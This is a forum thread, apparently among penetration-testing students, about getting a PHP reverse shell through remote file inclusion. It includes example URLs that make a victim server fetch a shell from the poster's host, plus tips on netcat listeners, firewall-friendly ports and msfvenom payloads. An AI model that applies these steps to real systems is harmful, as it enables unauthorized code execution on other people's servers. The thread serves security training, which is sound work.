Rfi webshell (reverse shell)

liz4rdliz4rd Member Posts: 51 ■■□□□□□□□□

I am able to use a page= in the url to specify an external host (me).
If I say for example victimurl.page=http://my-ip-address/rev-shell.php and I see the shell being collected from my machine, is that shell stored on the victim before calling back to me for the rev shell, or does it just execute on collection?


  • McxRisleyMcxRisley OSCP, CASP, CySA+, CPT+, Sec+, CEH, Splunk Admin Member Posts: 494 ■■■■■□□□□□
    So in short answer form, yes and no.

    If the server running the application doesn't have a firewall or any checks running on content that gets passed to it then your shell will get stored on the victim server. In this case, since your using what I'm assuming is just a basic reverse php shell(probably the one from the web shells directory on Kali), the shell will not just automatically call back to your system. In order for the shell to call back, you need to first find out where the shell was stored on the victim server and then get the shell to execute. Getting the shell to execute is usually done by browsing to the location of the shell on the victim server. This is where using a proxy such as BurpSuite would come in handy. You will also need a listener to catch the incoming connection, such as netcat.
    I'm not allowed to say what my previous occupation was, but let's just say it rhymes with architect.
  • liz4rdliz4rd Member Posts: 51 ■■□□□□□□□□
    Yes I've set up the nc listener on the port specified in the code of the reverse shell. But the thing is, as soon as I execute the page=http.x.x.x.x/myrevshell.php, it picks it up from my simplehttpserver, but then gives me an error saying it can't daemonise. So my point is, this is doing something with my shell to give this message, without having to browse to the location (granted it's erroring), but it is trying to execute something straight from the rfi command, hence the error message.

    The error is not bothering me, as I'll work it out, I'm more interested in if this is trying to execute without downloading to the victims machine.

    I'm not sure if im making it clear.
  • deadjoedeadjoe Member Posts: 24 ■■■□□□□□□□
    The failed to daemonize error is normal with that particular webshell.

    If the url looks something like this "http://x.x.x.x/?page=http://y.y.y.y/shell.php", then the webshell code will be executed in memory without touching the disk AFAIK.

    If the netcat listener doesn't catch the shell, then try common ports in the webshell eg. 21,22,25,80,443,8080. You might also try a msfvenom PHP reverse shell payload instead.
  • liz4rdliz4rd Member Posts: 51 ■■□□□□□□□□
    Thanks, that's exactly what I was looking for. So even though it's erroring, it being executed in the victims memory and not being downloaded to their machine.
Sign In or Register to comment.